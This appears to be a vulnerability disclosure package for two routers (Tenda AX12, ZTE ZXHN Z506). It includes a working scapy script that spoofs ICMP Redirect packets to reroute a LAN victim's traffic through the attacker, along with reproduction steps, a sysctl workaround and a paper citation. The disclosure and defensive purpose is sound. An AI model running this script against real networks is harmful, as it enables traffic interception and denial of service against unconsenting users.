ICMP Redirect attacks

exp.py

import sys

from scapy.arch import conf, get_if_addr
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sendp

if len(sys.argv) != 4:
    print(f'Usage: {sys.argv[0]} <interface> <victim IP> <server IP>')
    exit(1)

iface, victim, server = sys.argv[1:]

attacker = get_if_addr(iface)
gw = conf.route.route()[2]

sendp(
    IP(src=gw, dst=victim)
    / ICMP(type=5, code=1, gw=attacker)
    / IP(src=victim, dst=server)
    / ICMP(),
    iface=iface,
)

tenda-ax12.md

Metadata

CVE ID: CVE-2024-40503

CWE-940: Improper Verification of Source of a Communication Channel

Description

Tenda AX12 router (firmware version V16.03.49.18_cn) has been confirmed to be vulnerable ICMP Redirect attacks. An attacker can hijack the victim's traffic by sending ICMP Redirect packets to the victim's device.

Please refer to the paper¹ for more details.

Reproduction

Environment:

• Attacker and victim are in the same LAN.
• Victim accepts ICMP Redirect packets (which is default on most Linux distributions).

Steps:

1. Under initial conditions, the victim's traffic is routed through the gateway. ping 8.8.8.8 should succeed on the victim's machine, and ip route get 8.8.8.8 should yield the gateway's IP address.
2. The attacker sends an ICMP Redirect packet (exp.py) to the victim, redirecting traffic to the attacker's IP address.
3. The victim's traffic is now routed through the attacker. ip route get 8.8.8.8 would now yield the attacker's IP address, and the connection to 8.8.8.8 would fail.

Above demonstrates a DoS attack. This vulnerability can also be exploited to intercept the victim's traffic.

Workaround

Before this vulnerability is fixed by the vendor, users can disable ICMP Redirect acceptance on their devices. On Linux, this can be done by running sysctl -w net.ipv4.conf.all.accept_redirects=0.

Credit

Shiyao Guo, Ke Xu, Xuewei Feng, Qi Li, Yuxiang Yang

Footnotes

1. Feng, Xuewei, et al. "Man-in-the-middle attacks without rogue AP: when WPAs meet ICMP redirects." 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023. ↩

zte-zxhn-z506.md

Metadata

CVE ID: CVE-2024-40504

CWE-940: Improper Verification of Source of a Communication Channel

Description

ZTE ZXHN Z506 router (firmware version V1.0.0.2B2.8000) has been confirmed to be vulnerable ICMP Redirect attacks. An attacker can hijack the victim's traffic by sending ICMP Redirect packets to the victim's device.

Please refer to the paper¹ for more details.

Reproduction

Environment:

• Attacker and victim are in the same LAN.
• Victim accepts ICMP Redirect packets (which is default on most Linux distributions).

Steps:

1. Under initial conditions, the victim's traffic is routed through the gateway. ping 8.8.8.8 should succeed on the victim's machine, and ip route get 8.8.8.8 should yield the gateway's IP address.
2. The attacker sends an ICMP Redirect packet (exp.py) to the victim, redirecting traffic to the attacker's IP address.
3. The victim's traffic is now routed through the attacker. ip route get 8.8.8.8 would now yield the attacker's IP address, and the connection to 8.8.8.8 would fail.

Above demonstrates a DoS attack. This vulnerability can also be exploited to intercept the victim's traffic.

Workaround

Before this vulnerability is fixed by the vendor, users can disable ICMP Redirect acceptance on their devices. On Linux, this can be done by running sysctl -w net.ipv4.conf.all.accept_redirects=0.

Credit

Shiyao Guo, Ke Xu, Xuewei Feng, Qi Li, Yuxiang Yang

Footnotes

1. Feng, Xuewei, et al. "Man-in-the-middle attacks without rogue AP: when WPAs meet ICMP redirects." 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023. ↩